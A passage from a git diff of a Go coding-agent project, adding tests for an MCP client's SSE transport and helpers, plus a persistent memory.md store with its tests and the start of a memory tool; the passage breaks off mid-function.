+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+func TestMCPServerSSECallFlow(t *testing.T) {
+	var (
+		mu          sync.Mutex
+		messageReqs []RPCRequest
+		streamW     http.ResponseWriter
+		flusher     http.Flusher
+	)
+
+	stream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodGet {
+			w.WriteHeader(http.StatusMethodNotAllowed)
+			return
+		}
+		w.Header().Set("Content-Type", "text/event-stream")
+		w.Header().Set("Cache-Control", "no-cache")
+		w.Header().Set("Connection", "keep-alive")
+		w.Header().Set("Mcp-Session-Id", "sse-sid")
+		f, ok := w.(http.Flusher)
+		if !ok {
+			t.Fatalf("response writer does not support flush")
+		}
+		mu.Lock()
+		streamW = w
+		flusher = f
+		mu.Unlock()
+		<-r.Context().Done()
+	}))
+	defer stream.Close()
+
+	message := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		defer r.Body.Close()
+		var req RPCRequest
+		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+			w.WriteHeader(http.StatusBadRequest)
+			_ = json.NewEncoder(w).Encode(map[string]any{"error": "bad json"})
+			return
+		}
+		mu.Lock()
+		messageReqs = append(messageReqs, req)
+		readyW := streamW
+		readyF := flusher
+		mu.Unlock()
+
+		w.Header().Set("Content-Type", "application/json")
+		w.Header().Set("Mcp-Session-Id", "sse-sid")
+
+		switch req.Method {
+		case "initialize":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      req.ID,
+				"result":  map[string]any{"protocolVersion": mcpProtocolVersion},
+			})
+		case "notifications/initialized":
+			_ = json.NewEncoder(w).Encode(map[string]any{"jsonrpc": "2.0", "result": map[string]any{}})
+		case "tools/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      req.ID,
+				"result": map[string]any{
+					"tools": []map[string]any{
+						{"name": "echo", "description": "sse echo", "inputSchema": map[string]any{"type": "object"}},
+					},
+				},
+			})
+		case "resources/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      req.ID,
+				"result":  map[string]any{"resources": []map[string]any{}},
+			})
+		case "prompts/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      req.ID,
+				"result":  map[string]any{"prompts": []map[string]any{}},
+			})
+		case "tools/call":
+			if readyW != nil && readyF != nil {
+				writeSSEJSON(readyW, readyF, map[string]any{
+					"jsonrpc": "2.0",
+					"id":      req.ID,
+					"result": map[string]any{
+						"content": []map[string]any{{"type": "text", "text": "sse-ok"}},
+					},
+				})
+			}
+			_ = json.NewEncoder(w).Encode(map[string]any{"jsonrpc": "2.0", "result": map[string]any{}})
+		default:
+			_ = json.NewEncoder(w).Encode(map[string]any{"jsonrpc": "2.0", "result": map[string]any{}})
+		}
+	}))
+	defer message.Close()
+
+	reg := tools.NewRegistry(t.TempDir(), sandbox.NewNoneSandbox())
+	reg.RegisterDefaults()
+	clients, err := ConnectServers(context.Background(), []ServerConfig{
+		{
+			Name:       "sse-server",
+			Type:       "sse",
+			URL:        stream.URL,
+			MessageURL: message.URL,
+		},
+	}, reg, Callbacks{})
+	if err != nil {
+		t.Fatalf("ConnectServers sse failed: %v", err)
+	}
+	defer CloseClients(clients)
+
+	var echoTool tools.Tool
+	for _, tt := range reg.All() {
+		if strings.Contains(tt.Name(), "_echo") {
+			echoTool = tt
+			break
+		}
+	}
+	if echoTool == nil {
+		t.Fatal("expected sse echo tool registration")
+	}
+	out, err := echoTool.Execute(context.Background(), map[string]any{})
+	if err != nil {
+		t.Fatalf("sse tool execute failed: %v", err)
+	}
+	if !strings.Contains(out.Text, "sse-ok") {
+		t.Fatalf("unexpected sse tool output: %q", out.Text)
+	}
+
+	mu.Lock()
+	defer mu.Unlock()
+	if len(messageReqs) == 0 {
+		t.Fatal("expected posts to messageUrl")
+	}
+	if clients[0].sessionID != "sse-sid" {
+		t.Fatalf("expected sessionID from stream/header, got %q", clients[0].sessionID)
+	}
+}
+
+func TestMCPServerSSENotificationCallback(t *testing.T) {
+	var (
+		mu         sync.Mutex
+		gotMethods []string
+		readyOnce  sync.Once
+	)
+	streamReady := make(chan struct{})
+	notifyCh := make(chan map[string]any, 1)
+	stream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/event-stream")
+		f, _ := w.(http.Flusher)
+		readyOnce.Do(func() { close(streamReady) })
+		select {
+		case msg := <-notifyCh:
+			writeSSEJSON(w, f, msg)
+			<-r.Context().Done()
+		case <-r.Context().Done():
+		}
+	}))
+	defer stream.Close()
+
+	message := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		defer r.Body.Close()
+		var req RPCRequest
+		_ = json.NewDecoder(r.Body).Decode(&req)
+		// Keep initialize/list calls deterministic via direct response to avoid stream-ready races.
+		switch req.Method {
+		case "initialize":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      req.ID,
+				"result":  map[string]any{"protocolVersion": mcpProtocolVersion},
+			})
+		case "tools/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      req.ID,
+				"result":  map[string]any{"tools": []any{}},
+			})
+		case "resources/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      req.ID,
+				"result":  map[string]any{"resources": []any{}},
+			})
+		case "prompts/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      req.ID,
+				"result":  map[string]any{"prompts": []any{}},
+			})
+		default:
+			_ = json.NewEncoder(w).Encode(map[string]any{"jsonrpc": "2.0", "result": map[string]any{}})
+		}
+	}))
+	defer message.Close()
+
+	reg := tools.NewRegistry(t.TempDir(), sandbox.NewNoneSandbox())
+	reg.RegisterDefaults()
+	clients, err := ConnectServers(context.Background(), []ServerConfig{
+		{Name: "notify-sse", Type: "sse", URL: stream.URL, MessageURL: message.URL},
+	}, reg, Callbacks{
+		OnNotification: func(serverName, method string, params json.RawMessage) {
+			mu.Lock()
+			defer mu.Unlock()
+			gotMethods = append(gotMethods, method)
+		},
+	})
+	if err != nil {
+		t.Fatalf("connect sse failed: %v", err)
+	}
+	defer CloseClients(clients)
+
+	select {
+	case <-streamReady:
+	case <-time.After(2 * time.Second):
+		t.Fatal("timeout waiting sse stream ready")
+	}
+	notifyCh <- map[string]any{
+		"jsonrpc": "2.0",
+		"method":  "notifications/progress",
+		"params":  map[string]any{"progress": 0.5},
+	}
+
+	deadline := time.Now().Add(2 * time.Second)
+	for {
+		mu.Lock()
+		ok := len(gotMethods) > 0
+		mu.Unlock()
+		if ok {
+			break
+		}
+		if time.Now().After(deadline) {
+			t.Fatal("timeout waiting notification callback")
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	mu.Lock()
+	defer mu.Unlock()
+	if gotMethods[0] != "notifications/progress" {
+		t.Fatalf("unexpected notification method: %v", gotMethods)
+	}
+}
+
+func writeSSEJSON(w http.ResponseWriter, fl http.Flusher, v any) {
+	b, _ := json.Marshal(v)
+	_, _ = fmt.Fprintf(w, "data: %s\n\n", string(b))
+	fl.Flush()
+}
diff --git a/internal/mcp/mcp_test.go b/internal/mcp/mcp_test.go
new file mode 100644
index 0000000..937072c
--- /dev/null
+++ b/internal/mcp/mcp_test.go
@@ -0,0 +1,129 @@
+package mcp
+
+import (
+	"bytes"
+	"encoding/json"
+	"strings"
+	"testing"
+)
+
+func TestUniqueToolName(t *testing.T) {
+	existing := map[string]struct{}{
+		"mcp_a_b":   {},
+		"mcp_a_b_2": {},
+	}
+	got := uniqueToolName("mcp_a_b", existing)
+	if got != "mcp_a_b_3" {
+		t.Fatalf("expected mcp_a_b_3, got %q", got)
+	}
+}
+
+func TestMCPContentToText(t *testing.T) {
+	out := mcpContentToText([]mcpContentBlock{
+		{Type: "text", Text: "hello"},
+		{Type: "json", JSON: json.RawMessage(`{"k":"v"}`)},
+		{Type: "image", MimeType: "image/png"},
+	})
+	want := "hello\n{\"k\":\"v\"}\n[image content: image/png]"
+	if out != want {
+		t.Fatalf("unexpected output:\nwant: %s\ngot:  %s", want, out)
+	}
+}
+
+func TestReadLoopRespondsPing(t *testing.T) {
+	in := bytes.NewBufferString("{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"ping\"}\n")
+	var out bytes.Buffer
+	client := &Client{
+		name:  "test",
+		stdin: nopWriteCloser{Writer: &out},
+	}
+	client.readLoop(in)
+
+	resp := out.String()
+	if !strings.Contains(resp, `"id":1`) {
+		t.Fatalf("expected ping response id, got %q", resp)
+	}
+	if !strings.Contains(resp, `"result":{}`) {
+		t.Fatalf("expected ping response result, got %q", resp)
+	}
+}
+
+func TestPromptToolFormatsMessages(t *testing.T) {
+	client := &Client{name: "srv"}
+	tool := &mcpPromptTool{
+		client: client,
+		info:   mcpPromptInfo{Name: "draft"},
+		name:   "mcp_srv_prompt_draft",
+	}
+	// monkey-patch through direct method behavior by wrapping getPrompt call expectation
+	_ = tool
+	// lightweight coverage on formatter branch with direct assembly
+	out := mcpPromptGetResult{
+		Description: "desc",
+		Messages: []mcpPromptSample{
+			{Role: "user", Content: mcpContentBlock{Type: "text", Text: "hello"}},
+		},
+	}
+	var parts []string
+	if strings.TrimSpace(out.Description) != "" {
+		parts = append(parts, out.Description)
+	}
+	for _, msg := range out.Messages {
+		content := mcpContentToText([]mcpContentBlock{msg.Content})
+		parts = append(parts, "["+msg.Role+"]\n"+content)
+	}
+	got := strings.Join(parts, "\n\n")
+	if !strings.Contains(got, "desc") || !strings.Contains(got, "hello") {
+		t.Fatalf("unexpected formatted prompt output: %q", got)
+	}
+}
+
+func TestHandleInboundNotificationNoPanic(t *testing.T) {
+	c := &Client{name: "srv"}
+	c.handleInboundNotification(RPCRequest{Method: "notifications/progress"})
+	c.handleInboundNotification(RPCRequest{Method: "logging/message"})
+	c.handleInboundNotification(RPCRequest{Method: "notifications/cancelled"})
+	c.handleInboundNotification(RPCRequest{Method: "notifications/unknown"})
+}
+
+func TestExtractSamplingPrompt(t *testing.T) {
+	raw := json.RawMessage(`{
+		"messages":[
+			{"role":"user","content":"hello"},
+			{"role":"user","content":[{"type":"text","text":"world"}]}
+		]
+	}`)
+	got := extractSamplingPrompt(raw)
+	if got != "hello\nworld" {
+		t.Fatalf("unexpected prompt: %q", got)
+	}
+}
+
+func TestResourceToolURIOverride(t *testing.T) {
+	tl := &mcpResourceTool{
+		client: &Client{name: "srv"},
+		info:   mcpResourceInfo{URI: "file://a"},
+		name:   "mcp_srv_resource_file_a",
+	}
+	// only cover parameter override branch without network call
+	uri := tl.info.URI
+	params := map[string]any{"uri": "file://b"}
+	if v, ok := params["uri"].(string); ok && strings.TrimSpace(v) != "" {
+		uri = v
+	}
+	if uri != "file://b" {
+		t.Fatalf("expected override uri, got %q", uri)
+	}
+}
+
+type nopWriteCloser struct {
+	Writer *bytes.Buffer
+}
+
+func (n nopWriteCloser) Write(p []byte) (int, error) {
+	return n.Writer.Write(p)
+}
+
+func (n nopWriteCloser) Close() error {
+	return nil
+}
diff --git a/internal/memory/store.go b/internal/memory/store.go
new file mode 100644
index 0000000..5880d1c
--- /dev/null
+++ b/internal/memory/store.go
@@ -0,0 +1,349 @@
+// Package memory implements persistent memory storage for Hermes mode.
+// Memory is stored as a human-readable Markdown file (memory.md).
+package memory
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// Store manages reading and writing of memory.md files.
+type Store struct {
+	mu sync.Mutex
+
+	// explicitPath overrides auto-discovery when set via config.
+	explicitPath string
+	// workDir is the project working directory, used as fallback for default write path.
+	workDir string
+}
+
+// NewStore creates a memory store.
+// If explicitPath is non-empty, it overrides the default discovery logic.
+// workDir is used as fallback directory for creating new memory files.
+func NewStore(explicitPath, workDir string) *Store {
+	return &Store{explicitPath: explicitPath, workDir: workDir}
+}
+
+// defaultTemplate is the initial content for a new memory.md file.
+const defaultTemplate = `# Agent Memory
+
+## User Profile
+
+## Working Memory
+
+## Lessons Learned
+`
+
+// Resolve finds the memory.md file to use.
+// Priority: explicit path → .vibe/memory.md → <GLOBAL_DIR>/memory.md
+// Returns (path, source, error). source is "explicit", "project", "global", or "".
+func (s *Store) Resolve() (path string, source string, err error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	return s.resolveNoLock()
+}
+
+func (s *Store) resolveNoLock() (path string, source string, err error) {
+	// 1. Explicit path from config
+	if s.explicitPath != "" {
+		if _, err := os.Stat(s.explicitPath); err == nil {
+			return s.explicitPath, "explicit", nil
+		}
+		// Explicit path configured but doesn't exist yet — will create here on write
+		return s.explicitPath, "explicit", nil
+	}
+
+	// 2. Project-level: .vibe/memory.md
+	projectPath := filepath.Join(".vibe", "memory.md")
+	if _, err := os.Stat(projectPath); err == nil {
+		return projectPath, "project", nil
+	}
+
+	// 3. Global: <GLOBAL_DIR>/memory.md
+	globalPath := filepath.Join(config.ConfigDir(), "memory.md")
+	if _, err := os.Stat(globalPath); err == nil {
+		return globalPath, "global", nil
+	}
+
+	// None exists — return empty (will be created on first write)
+	return "", "", nil
+}
+
+// Read returns the full content of memory.md.
+func (s *Store) Read() (content string, path string, source string, err error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	return s.readNoLock()
+}
+
+func (s *Store) readNoLock() (content string, path string, source string, err error) {
+	path, source, err = s.resolveNoLock()
+	if err != nil {
+		return "", "", "", err
+	}
+	if path == "" {
+		return "", "", "", nil // no memory file exists
+	}
+
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return "", path, source, nil
+		}
+		return "", "", "", fmt.Errorf("read memory file: %w", err)
+	}
+
+	return string(data), path, source, nil
+}
+
+// ReadSection returns the content of a specific ## section.
+func (s *Store) ReadSection(section string) (string, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	content, _, _, err := s.readNoLock()
+	if err != nil {
+		return "", err
+	}
+	if content == "" {
+		return "", nil
+	}
+
+	return extractSection(content, section), nil
+}
+
+// Add appends a line to a specific section.
+func (s *Store) Add(section, entry string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	content, path, _, err := s.readNoLock()
+	if err != nil {
+		return err
+	}
+
+	if path == "" {
+		// Create new file
+		path = s.defaultWritePath()
+		content = defaultTemplate
+	}
+
+	updated := addToSection(content, section, entry)
+	return s.writeFile(path, updated)
+}
+
+// Update replaces old text with new text in a section.
+func (s *Store) Update(section, oldText, newText string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	content, path, _, err := s.readNoLock()
+	if err != nil {
+		return err
+	}
+	if path == "" || content == "" {
+		return fmt.Errorf("no memory file to update")
+	}
+
+	sectionContent := extractSection(content, section)
+	if sectionContent == "" {
+		return fmt.Errorf("section '%s' not found", section)
+	}
+
+	if !strings.Contains(sectionContent, oldText) {
+		return fmt.Errorf("text not found in section '%s'", section)
+	}
+
+	updated, ok := replaceInSection(content, section, oldText, newText)
+	if !ok {
+		return fmt.Errorf("text not found in section '%s'", section)
+	}
+	return s.writeFile(path, updated)
+}
+
+// Delete removes a line from a section.
+func (s *Store) Delete(section, entry string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	content, path, _, err := s.readNoLock()
+	if err != nil {
+		return err
+	}
+	if path == "" || content == "" {
+		return fmt.Errorf("no memory file to delete from")
+	}
+
+	updated, found := deleteFromSection(content, section, entry)
+	if !found {
+		return fmt.Errorf("entry not found in section '%s'", section)
+	}
+
+	return s.writeFile(path, updated)
+}
+
+// WriteAll overwrites the entire memory.md content.
+func (s *Store) WriteAll(content string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	_, path, _, err := s.readNoLock()
+	if err != nil {
+		return err
+	}
+	if path == "" {
+		path = s.defaultWritePath()
+	}
+	return s.writeFile(path, content)
+}
+
+// --- Helpers ---
+
+// defaultWritePath determines where to create a new memory.md.
+// Default: project-level (.vibe/memory.md). Only uses global if explicitly configured.
+func (s *Store) defaultWritePath() string {
+	if s.explicitPath != "" {
+		return s.explicitPath
+	}
+	// Default to project-level: workDir/.vibe/memory.md
+	if s.workDir != "" {
+		return filepath.Join(s.workDir, ".vibe", "memory.md")
+	}
+	// Fallback: cwd/.vibe/memory.md
+	return filepath.Join(".vibe", "memory.md")
+}
+
+func replaceInSection(content, section, oldText, newText string) (string, bool) {
+	start, end, ok := sectionBounds(content, section)
+	if !ok {
+		return content, false
+	}
+	segment := content[start:end]
+	if !strings.Contains(segment, oldText) {
+		return content, false
+	}
+	segment = strings.Replace(segment, oldText, newText, 1)
+	return content[:start] + segment + content[end:], true
+}
+
+func deleteFromSection(content, section, entry string) (string, bool) {
+	start, end, ok := sectionBounds(content, section)
+	if !ok {
+		return content, false
+	}
+	segment := content[start:end]
+	lines := strings.Split(segment, "\n")
+	result := make([]string, 0, len(lines))
+	found := false
+	for _, line := range lines {
+		trimmed := strings.TrimSpace(line)
+		// Match "- entry" or "entry" (with or without bullet)
+		cleanEntry := strings.TrimPrefix(strings.TrimSpace(entry), "- ")
+		cleanLine := strings.TrimPrefix(trimmed, "- ")
+		if cleanLine == cleanEntry && !found {
+			found = true
+			continue // skip this line
+		}
+		result = append(result, line)
+	}
+	if !found {
+		return content, false
+	}
+	return content[:start] + strings.Join(result, "\n") + content[end:], true
+}
+
+func sectionBounds(content, section string) (start, end int, ok bool) {
+	header := "## " + section
+	idx := strings.Index(content, header)
+	if idx < 0 {
+		return 0, 0, false
+	}
+	afterHeader := content[idx+len(header):]
+	nlIdx := strings.Index(afterHeader, "\n")
+	if nlIdx < 0 {
+		return len(content), len(content), true
+	}
+	start = idx + len(header) + nlIdx + 1
+	rest := content[start:]
+	nextSection := strings.Index(rest, "\n## ")
+	if nextSection >= 0 {
+		return start, start + nextSection, true
+	}
+	return start, len(content), true
+}
+
+// writeFile writes content to path, creating parent dirs as needed.
+func (s *Store) writeFile(path, content string) error {
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return fmt.Errorf("create directory: %w", err)
+	}
+	return os.WriteFile(path, []byte(content), 0600)
+}
+
+// extractSection extracts content under a ## heading.
+func extractSection(content, section string) string {
+	header := "## " + section
+	idx := strings.Index(content, header)
+	if idx < 0 {
+		return ""
+	}
+
+	// Find the start of content after the header line
+	afterHeader := content[idx+len(header):]
+	nlIdx := strings.Index(afterHeader, "\n")
+	if nlIdx < 0 {
+		return ""
+	}
+	afterHeader = afterHeader[nlIdx+1:]
+
+	// Find the next ## heading or end of file
+	nextSection := strings.Index(afterHeader, "\n## ")
+	if nextSection >= 0 {
+		afterHeader = afterHeader[:nextSection]
+	}
+
+	return strings.TrimSpace(afterHeader)
+}
+
+// addToSection appends an entry to a section. Creates the section if missing.
+func addToSection(content, section, entry string) string {
+	header := "## " + section
+
+	// Ensure entry has bullet prefix
+	trimmedEntry := strings.TrimSpace(entry)
+	if !strings.HasPrefix(trimmedEntry, "- ") {
+		trimmedEntry = "- " + trimmedEntry
+	}
+
+	idx := strings.Index(content, header)
+	if idx < 0 {
+		// Section doesn't exist — append at end
+		return strings.TrimRight(content, "\n") + "\n\n" + header + "\n\n" + trimmedEntry + "\n"
+	}
+
+	// Find the end of this section (next ## or EOF)
+	afterHeader := content[idx+len(header):]
+	nlIdx := strings.Index(afterHeader, "\n")
+	if nlIdx < 0 {
+		return content + "\n\n" + trimmedEntry + "\n"
+	}
+
+	sectionStart := idx + len(header) + nlIdx + 1
+	rest := content[sectionStart:]
+
+	nextSection := strings.Index(rest, "\n## ")
+	if nextSection >= 0 {
+		// Insert before next section
+		insertPoint := sectionStart + nextSection
+		return content[:insertPoint] + trimmedEntry + "\n" + content[insertPoint:]
+	}
+
+	// Append at end
+	return strings.TrimRight(content, "\n") + "\n" + trimmedEntry + "\n"
+}
diff --git a/internal/memory/store_test.go b/internal/memory/store_test.go
new file mode 100644
index 0000000..85d0fdc
--- /dev/null
+++ b/internal/memory/store_test.go
@@ -0,0 +1,319 @@
+package memory
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func TestStoreReadWrite(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	store := NewStore(path, "")
+
+	// No file yet
+	content, _, _, err := store.Read()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if content != "" {
+		t.Errorf("expected empty, got %q", content)
+	}
+
+	// Add creates file
+	if err := store.Add("User Profile", "prefers Go"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, rpath, source, err := store.Read()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if rpath != path {
+		t.Errorf("expected path %s, got %s", path, rpath)
+	}
+	if source != "explicit" {
+		t.Errorf("expected source explicit, got %s", source)
+	}
+	if !strings.Contains(content, "- prefers Go") {
+		t.Errorf("expected content to contain 'prefers Go', got %q", content)
+	}
+}
+
+func TestStoreReadSection(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- likes Go
+- prefers vim
+
+## Working Memory
+
+- project version is v0.1.27
+
+## Lessons Learned
+
+- always read before edit
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	section, err := store.ReadSection("User Profile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !strings.Contains(section, "likes Go") {
+		t.Errorf("expected 'likes Go' in section, got %q", section)
+	}
+	if strings.Contains(section, "project version") {
+		t.Error("section should not contain Working Memory content")
+	}
+
+	section, err = store.ReadSection("Working Memory")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !strings.Contains(section, "project version") {
+		t.Errorf("expected 'project version' in section, got %q", section)
+	}
+
+	section, err = store.ReadSection("Nonexistent")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if section != "" {
+		t.Errorf("expected empty for nonexistent section, got %q", section)
+	}
+}
+
+func TestStoreAdd(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- likes Go
+
+## Working Memory
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Add("Working Memory", "new fact"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "- new fact") {
+		t.Errorf("expected added entry, got %q", content)
+	}
+	// Original content should still be there
+	if !strings.Contains(content, "- likes Go") {
+		t.Errorf("original content lost")
+	}
+}
+
+func TestStoreUpdate(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## Working Memory
+
+- version is v0.1.26
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Update("Working Memory", "v0.1.26", "v0.1.27"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "v0.1.27") {
+		t.Errorf("expected updated text, got %q", content)
+	}
+	if strings.Contains(content, "v0.1.26") {
+		t.Error("old text should be replaced")
+	}
+}
+
+func TestStoreUpdateOnlyWithinSection(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- shared fact
+
+## Working Memory
+
+- shared fact
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Update("Working Memory", "shared fact", "working fact"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "## User Profile\n\n- shared fact") {
+		t.Fatalf("user profile entry should remain unchanged, got %q", content)
+	}
+	if !strings.Contains(content, "## Working Memory\n\n- working fact") {
+		t.Fatalf("working memory entry should be updated, got %q", content)
+	}
+}
+
+func TestStoreDelete(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## Working Memory
+
+- fact one
+- fact two
+- fact three
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Delete("Working Memory", "fact two"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if strings.Contains(content, "fact two") {
+		t.Error("deleted entry should not be present")
+	}
+	if !strings.Contains(content, "fact one") || !strings.Contains(content, "fact three") {
+		t.Error("non-deleted entries should remain")
+	}
+}
+
+func TestStoreDeleteOnlyWithinSection(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- shared fact
+
+## Working Memory
+
+- shared fact
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Delete("Working Memory", "shared fact"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "## User Profile\n\n- shared fact") {
+		t.Fatalf("user profile entry should remain, got %q", content)
+	}
+	working := extractSection(content, "Working Memory")
+	if strings.Contains(working, "shared fact") {
+		t.Fatalf("working memory entry should be removed, got %q", working)
+	}
+}
+
+func TestStoreWriteAllUsesReadPath(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+	os.WriteFile(path, []byte("# old"), 0600)
+	store := NewStore(path, "")
+
+	if err := store.WriteAll("# new"); err != nil {
+		t.Fatal(err)
+	}
+
+	got, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(got) != "# new" {
+		t.Fatalf("content = %q, want # new", string(got))
+	}
+}
+
+func TestStoreAddNewSection(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- likes Go
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Add("Custom Section", "custom fact"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "## Custom Section") {
+		t.Error("new section should be created")
+	}
+	if !strings.Contains(content, "- custom fact") {
+		t.Error("content should be added to new section")
+	}
+}
+
+func TestExtractSection(t *testing.T) {
+	content := `# Memory
+
+## First
+
+- a
+- b
+
+## Second
+
+- c
+
+## Third
+
+- d
+`
+	first := extractSection(content, "First")
+	if first != "- a\n- b" {
+		t.Errorf("First section: %q", first)
+	}
+
+	second := extractSection(content, "Second")
+	if second != "- c" {
+		t.Errorf("Second section: %q", second)
+	}
+
+	third := extractSection(content, "Third")
+	if third != "- d" {
+		t.Errorf("Third section: %q", third)
+	}
+
+	missing := extractSection(content, "Missing")
+	if missing != "" {
+		t.Errorf("Missing section should be empty: %q", missing)
+	}
+}
diff --git a/internal/memory/tool.go b/internal/memory/tool.go
new file mode 100644
index 0000000..f7e115a
--- /dev/null
+++ b/internal/memory/tool.go
@@ -0,0 +1,158 @@
+package memory
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// MemoryTool provides persistent memory read/write via memory.md.
+type MemoryTool struct {
+	store *Store
+}
+
+// NewMemoryTool creates a new memory tool.
+func NewMemoryTool(store *Store) *MemoryTool {
+	return &MemoryTool{store: store}
+}
+
+func (t *MemoryTool) Name() string {
+	return "memory"
+}
+
+func (t *MemoryTool) Description() string {
+	return "Read and write persistent memory (memory.md). Use to recall user preferences, project context, and lessons learned. Memory persists across sessions."
+}
+
+func (t *MemoryTool) PromptSnippet() string {
+	return "Read/write persistent memory across sessions"
+}
+
+func (t *MemoryTool) PromptGuidelines() []string {
+	return []string{
+		"A persistent memory file (memory.md) is available via the `memory` tool. Read it at the start of complex tasks to recall user preferences and prior context. Update it when you learn important facts about the user or project.",
+	}
+}
+
+func (t *MemoryTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"action": {
+				"type": "string",
+				"description": "The action to perform: read, add, update, delete",
+				"enum": ["read", "add", "update", "delete"]
+			},
+			"section": {
+				"type": "string",
+				"description": "The section name (e.g. 'User Profile', 'Working Memory', 'Lessons Learned'). Required for add/update/delete. Optional for read (omit to read all)."
+			},
+			"content": {
+				"type": "string",
+				"description": "The content to add or delete. Required for add and delete actions."
+			},
+			"old": {
+				"type": "string",
+				"description": "The old text to replace. Required for update action."
+			},
+			"new": {
+				"type": "string",
+				"description": "The new text to replace with. Required for update action."
+			}
+		},
+		"required": ["action"]
+	}`)
+}
+
+func (t *MemoryTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	action, _ := params["action"].(string)
+	section, _ := params["section"].(string)
+	content, _ := params["content"].(string)
+	old, _ := params["old"].(string)
+	new_, _ := params["new"].(string)
+
+	switch action {
+	case "read":
+		return t.executeRead(section)
+	case "add":
+		return t.executeAdd(section, content)
+	case "update":
+		return t.executeUpdate(section, old, new_)
+	case "delete":
+		return t.executeDelete(section, content)
+	default:
+		return tools.ToolResult{}, fmt.Errorf("unknown action: %s (use: read, add, update, delete)", action)
+	}
+}
+
+func (t *MemoryTool) executeRead(section string) (tools.ToolResult, error) {
+	if section != "" {
+		content, err := t.store.ReadSection(section)
+		if err != nil {
+			return tools.ToolResult{}, err
+		}
+		if content == "" {
+			return tools.NewTextToolResult(fmt.Sprintf("Section '%s' is empty or not found.", section)), nil
+		}
+		return tools.NewTextToolResult(content), nil
